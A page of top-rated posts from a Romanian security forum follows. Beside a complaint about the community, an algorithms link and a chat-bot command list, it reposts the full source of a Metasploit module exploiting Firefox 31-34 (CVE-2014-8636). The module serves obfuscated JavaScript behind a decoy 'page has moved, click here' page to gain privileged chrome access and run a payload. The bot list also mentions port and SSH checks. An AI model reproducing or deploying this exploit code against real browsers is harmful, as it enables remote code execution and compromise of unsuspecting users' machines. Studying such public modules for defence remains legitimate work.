Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/24/15 in all areas

  1. Activez pe forum inca de prin 2011, cu cat trece timpul observ ca lucrurile devin din ce in ce mai nasoale.Tin minte ca prima data cand m-am inregistrat era o armonie toatala aici, zilnic apareau posturi de calitate si nimeni nu se certa.Erau multi care ajutau comunitatea si o tineau sus dar acum nimeni nu mai face nimic. Pe o parte le dau dreptate celor care faceau mereu posturi de caliltate iar acum nici nu-i mai vezi la culoare.De ce sa imparta munca lui cu un fraier care nu apreciaza nimic.(la un moment dat tin minte ca am postat ceva in Stuff iar un user m-a rugat sa ii dau si lui parola iar dupa 2 zile m-a injurat de tot neamul) Asa cum zicea si @Aerosol care e huiduit de jumatate din forum... Acum ca nu stiu ce sa mai zic si oricum va doare in pula pe toti de ce am scris, mi-am adus aminte de ceva ce a zis Nemessis Ps. Din nou ma astept sa fiu injurat dar va spun cu mana pe inima ca satisfactia mea cea mai mare o sa fie cand o sa ma injure unul si o sa aflu cine e
    1 point
  2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' # discovery and metasploit module ], 'DisclosureDate' => "Jan 20 2014", 'References' => [ ['CVE', '2014-8636'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = js_obfuscate %Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var props = {}; props.has = function(n){ if (!window.top.x && n=='nodeType') { window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px"); if (window.top.x) { Object.setPrototypeOf(document, pro); setTimeout(function(){ x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ x.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ x.close(); }, 100) }, 100) }, 100); } } } var pro = Object.getPrototypeOf(document); Object.setPrototypeOf(document, Proxy.create(props)); | %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT'] || default_html} </body> </html> | end end Source
    1 point
  3. http://www.slideshare.net/SergheiUrban/algoritmi-14726298?related=1 În român?, algoritmi, pseudocod, nu e neap?rat un anume limbaj. Baft? mult? !
    1 point
  4. Ok, am castigat challenge-ul si am continuat sa adaug functii lui @Maximus Lista comenzi : [*] Criptari !a2b <text> (returns encrypted ASCII to Binary text) !aer <e/d> <text> (returns encrypted/decrypted AER 256 text) !armon <e/d> <text> (returns encrypted/decrypted ARMON 64 text) !atom <e/d> <text> (returns encrypted/decrypted ATOM 128 text) !b2a <text> (returns decrypted Binary to ASCII text) !b64 <e/d> <text> (returns encrypted/decrypted BASE64 text) !caesar <e/d> <text> (returns encrypted/decrypted Caesar Shift Code text) !esab <e/d> <text> (returns encrypted/decrypted ESAB 46 text) !ezip <e/d> <text> (returns encrypted/decrypted EZIP 64 text) !feron <e/d> <text> (returns encrypted/decrypted FERON 74 text) !gila <e/d> <text> (retuns encrypted/decrypted GILA 7 text) !haz <e/d> <text> (returns encrypted/decrypted HAZZ 15 text) !megan <e/d> <text> (returns encrypted/decrypted MEGAN 35 text) !morse <e/d> <text> (returns encrypted/decrypted Morse code text) !okto <e/d> <text> (returns encrypted/decrypted OKTO 3 text) !rc4 <e/d> <text> (returns RC4 encrypted/decrypted text) !rot <text> (returns ROT 13 encrypted text) !tigo <e/d> <text> (returns encrypted/decrypted TIGO 3 FX text) !tripo <e/d> <text> (returns encrypted/decrypted TRIPO 5 text) !zara <e/d> <text> (returns encrypted/decrypted ZARA 128 text) !zong <e/d> <text> (returns encrypted/decrypted ZONG 22 text) !detect <encrypted-text> (it will try to find encryption type and decode your text) !key <encryption KEY> (set your custom encryption key [ARMON-64/AER-256/etc]) !key * (to remove your encryption key) [*] Funny !bomb <username> (case sensitive username) to play the bomb game !bomb (to bomb a random channel user) There are 3 colors red blue and green. You must type one of them to defuse the bomb !chuck or !chuck <username> for a random Chuck Norris joke [*] Altele !bit <long-link> (it will return a short bit.ly link) !echeck <email-address> (check if email exists / works perfect with Yahoo! (needs more coding)) !hash <text> (returns : SHA1/MD5/SHA256 hash) !header <website> (will return HTTP request header and HTTP response header) !info <username> (small username info) !ip <ip-address> to view details (country,city,zip,latitude,logitude,time zone) of a specific IP Address. !lastlogin <username> (to view the last date that username logged in) !lastpost (to subscribe to last forum post) !lastpost (to unsubscribe from last forum post) !len <text> (returns text lenght) !low <text> (it will retur your text to lowercase) !offline <username> <message> to leave a offline message for a username. Once it comes online, he will be notified. !message <id> to view message and !clear to clear all your messages. !messages (to see if you have any messages) !clear (to clear all your messages) !ping <host: port> (this function has to be rewriten) !rev <text> (returns reverse text) !say <text> (Only admins can user this command) !seen <username> (it returs something like : I've seen nytro on Sun, 32 Dec 2099 03:52:58 +0200 saying Never say never!) !sock <ip: port> (it will connet to ip: port , checks if it's alive) !ssh <ip: port> or !ssh <ip> (it will check if ip/host has ssh open) !subscribe <cat-id> (9,12,13,15,16,17,18,19,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,40,42,43,45,48,49,53,54,55,56,58,60,61,62,63,65) To subscribe to a specific forum category. !subscribe (to view your subscribed categorys) !unsubscribe <cat-it> (to unsubscribe) !top (to view the most active chat users) [it will return something like : Gecko > J > Maximus > Aerosol > Kronzy] !up <text> (it will return your text to UPPERCASE) !uptime (you know this one) !uri <e/d> <link> (to URL encode/decode string) !zip <zip> or !zip <address> (returns full zip/addres info) !help !help <command> (ex.: !help seen sau !help !seen) Daca aveti propuneri, nu ezitati sa postati aici. Multumesc. P.S. 2800 linii de cod
    -1 points
×
×
  • Create New...